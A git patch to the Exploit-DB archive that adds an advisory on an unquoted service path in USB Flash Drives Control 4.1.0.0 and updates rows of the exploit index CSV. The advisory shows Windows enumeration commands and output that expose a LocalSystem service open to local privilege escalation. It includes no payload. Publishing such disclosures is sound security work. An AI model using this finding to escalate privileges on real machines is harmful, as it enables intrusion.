From 12f90395529400190c58f43a8b08de8145fd190c Mon Sep 17 00:00:00 2001 From: Exploit-DB Date: Thu, 8 Jun 2023 00:16:21 +0000 Subject: [PATCH] DB: 2023-06-08 2 changes to exploits/shellcodes/ghdb Apache 2.4.x - Buffer Overflow Yahoo User Interface library (YUI2) TreeView v2.8.2 - Multiple Reflected Cross Site Scripting (XSS) USB Flash Drives Control 4.1.0.0 - Unquoted Service Path --- exploits/windows/local/51508.txt | 36 ++++++++++++++++++++++++++++++++ files_exploits.csv | 5 +++-- 2 files changed, 39 insertions(+), 2 deletions(-) create mode 100644 exploits/windows/local/51508.txt diff --git a/exploits/windows/local/51508.txt b/exploits/windows/local/51508.txt new file mode 100644 index 000000000..c6c05a6f3 --- /dev/null +++ b/exploits/windows/local/51508.txt @@ -0,0 +1,36 @@ +# Exploit Title: USB Flash Drives Control 4.1.0.0 - Unquoted Service Path +# Date: 2023-31-05 +# Exploit Author: Jeffrey Bencteux +# Vendor Homepage: https://binisoft.org/ +# Software Link: https://binisoft.org/wfc +# Version: 4.1.0.0 +# Tested on: Microsoft Windows 11 Pro +# Vulnerability Type: Unquoted Service Path + +PS C:\> wmic service get name,displayname,pathname,startmode |findstr /i +"auto" |findstr /i /v "c:\windows" +USB Flash Drives Control usbcs C:\Program Files\USB Flash +Drives Control\usbcs.exe Auto + +PS C:\> sc.exe qc usbcs +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: usbcs + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Program Files\USB Flash Drives +Control\usbcs.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : USB Flash Drives Control + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem + +PS C:\> systeminfo +OS Name: Microsoft Windows 11 Pro +OS Version: 10.0.22621 N/A Build 22621 +OS Manufacturer: Microsoft Corporation + +-- +Jeffrey BENCTEUX \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 738f6653e..9f4f8dee9 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -11544,7 +11544,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 35786,exploits/multiple/webapps/35786.txt,"Ansible Tower 2.0.2 - Multiple Vulnerabilities",2015-01-14,"SEC Consult",webapps,multiple,80,2015-01-14,2015-01-14,0,OSVDB-116965;OSVDB-116964;OSVDB-116963;OSVDB-116962;OSVDB-116961;OSVDB-116960;OSVDB-116959;CVE-2015-1482;CVE-2015-1481;CVE-2015-1368,,,,, 44220,exploits/multiple/webapps/44220.txt,"antMan < 0.9.1a - Authentication Bypass",2018-03-02,"Joshua Bowser",webapps,multiple,,2018-03-02,2018-03-09,0,CVE-2018-7739,,,,, 50267,exploits/multiple/webapps/50267.txt,"Antminer Monitor 0.5.0 - Authentication Bypass",2021-09-06,Vulnz,webapps,multiple,,2021-09-06,2021-09-06,0,,,,,http://www.exploit-db.comantminer-monitor-0.5.0.zip, -51193,exploits/multiple/webapps/51193.py,"Apache 2.4.x - Buffer Overflow",2023-04-01,"Sunil Iyengar",webapps,multiple,,2023-04-01,2023-04-01,0,CVE-2021-44790,,,,, +51193,exploits/multiple/webapps/51193.py,"Apache 2.4.x - Buffer Overflow",2023-04-01,"Sunil Iyengar",webapps,multiple,,2023-04-01,2023-06-07,1,CVE-2021-44790,,,,, 49927,exploits/multiple/webapps/49927.py,"Apache Airflow 1.10.10 - 'Example Dag' Remote Code Execution",2021-06-02,"Pepe Berba",webapps,multiple,,2021-06-02,2021-06-02,0,CVE-2020-13927;CVE-2020-11978,,,,, 15710,exploits/multiple/webapps/15710.txt,"Apache Archiva 1.0 < 1.3.1 - Cross-Site Request Forgery",2010-12-09,"Anatolia Security",webapps,multiple,,2010-12-09,2010-12-09,1,CVE-2010-3449,,,,,http://www.anatoliasecurity.com/adv/as-adv-2010-001.txt 12689,exploits/multiple/webapps/12689.txt,"Apache Axis2 Administration Console - (Authenticated) Cross-Site Scripting",2010-05-21,"Richard Brain",webapps,multiple,,2010-05-20,2016-12-19,0,OSVDB-64844;CVE-2010-2103,,,,, @@ -34120,7 +34120,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 8066,exploits/php/webapps/8066.txt,"YACS CMS 8.11 - 'update_trailer.php' Remote File Inclusion",2009-02-16,ahmadbady,webapps,php,,2009-02-15,2017-02-13,1,OSVDB-52041,,,,, 44424,exploits/php/webapps/44424.txt,"Yahei PHP Prober 0.4.7 - Cross-Site Scripting",2018-04-09,ManhNho,webapps,php,,2018-04-09,2018-04-09,0,CVE-2018-9238,"Cross-Site Scripting (XSS)",,,http://www.exploit-db.comtz_e.zip, 7131,exploits/php/webapps/7131.txt,"yahoo answers - 'id' SQL Injection",2008-11-16,snakespc,webapps,php,,2008-11-15,2017-01-02,1,OSVDB-49906;CVE-2008-5490,,,,, -51198,exploits/php/webapps/51198.txt,"Yahoo User Interface library (YUI2) TreeView v2.8.2 - Multiple Reflected Cross Site Scripting (XSS)",2023-04-01,"SITE Team",webapps,php,,2023-04-01,2023-04-01,0,CVE-2022-48197,,,,, +51198,exploits/php/webapps/51198.txt,"Yahoo User Interface library (YUI2) TreeView v2.8.2 - Multiple Reflected Cross Site Scripting (XSS)",2023-04-01,"SITE Team",webapps,php,,2023-04-01,2023-06-07,1,CVE-2022-48197,,,,, 13845,exploits/php/webapps/13845.txt,"Yamamah - 'news' SQL Injection / Source Code Disclosure",2010-06-12,anT!-Tr0J4n,webapps,php,,2010-06-11,2016-10-27,0,CVE-2010-2336;CVE-2010-2335;CVE-2010-2334;CVE-2010-1300;OSVDB-65648;OSVDB-65479;OSVDB-63344,,,,http://www.exploit-db.comyamamah_v1.rar, 13849,exploits/php/webapps/13849.txt,"Yamamah 1.0 - SQL Injection",2010-06-12,TheMaStEr,webapps,php,,2010-06-11,,1,CVE-2010-1300,,,,http://www.exploit-db.comyamamah_v1.rar, 11947,exploits/php/webapps/11947.txt,"Yamamah 1.00 - Multiple Vulnerabilities",2010-03-30,indoushka,webapps,php,,2010-03-29,,0,OSVDB-63344;CVE-2010-2335;CVE-2010-1300,,,,http://www.exploit-db.comyamamah_v1.rar, @@ -41409,6 +41409,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 12469,exploits/windows/local/12469.rb,"Urgent Backup 3.20 / ABC Backup Pro 5.20 / ABC Backup 5.50 - '.zip' File (SEH)",2010-04-30,Lincoln,local,windows,,2010-04-29,,1,OSVDB-64213;CVE-2010-1686,,,,http://www.exploit-db.comabcbackupprosetup.exe,http://www.corelan.be:8800/advisories.php?id=CORELAN-10-034 19323,exploits/windows/local/19323.c,"URL Hunter - Local Buffer Overflow (DEP Bypass)",2012-06-21,Ayrbyte,local,windows,,2012-06-21,2012-06-25,1,OSVDB-83362,,,http://www.exploit-db.com/screenshots/idlt19500/urlhunter.png,http://www.exploit-db.comurlhuntersetup.exe, 16645,exploits/windows/local/16645.rb,"URSoft W32Dasm 8.93 - Disassembler Function Buffer Overflow (Metasploit)",2010-09-25,Metasploit,local,windows,,2010-09-25,2011-03-10,1,CVE-2005-0308;OSVDB-13169,"Metasploit Framework (MSF)",,,, +51508,exploits/windows/local/51508.txt,"USB Flash Drives Control 4.1.0.0 - Unquoted Service Path",2023-06-07,"Jeffrey Bencteux",local,windows,,2023-06-07,2023-06-07,0,,,,,, 41542,exploits/windows/local/41542.c,"USBPcap 1.1.0.0 (WireShark 2.2.5) - Local Privilege Escalation",2017-03-07,"Parvez Anwar",local,windows,,2017-03-07,2017-03-15,0,CVE-2017-6178,,,,, 39888,exploits/windows/local/39888.txt,"Valve Steam 3.42.16.13 - Local Privilege Escalation",2016-06-06,"Gregory Smiley",local,windows,,2016-06-06,2016-06-06,0,CVE-2016-5237,,,,, 17459,exploits/windows/local/17459.txt,"Valve Steam Client Application 1559/1559 - Local Privilege Escalation",2011-06-29,LiquidWorm,local,windows,,2011-06-29,2011-06-29,0,,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5022.php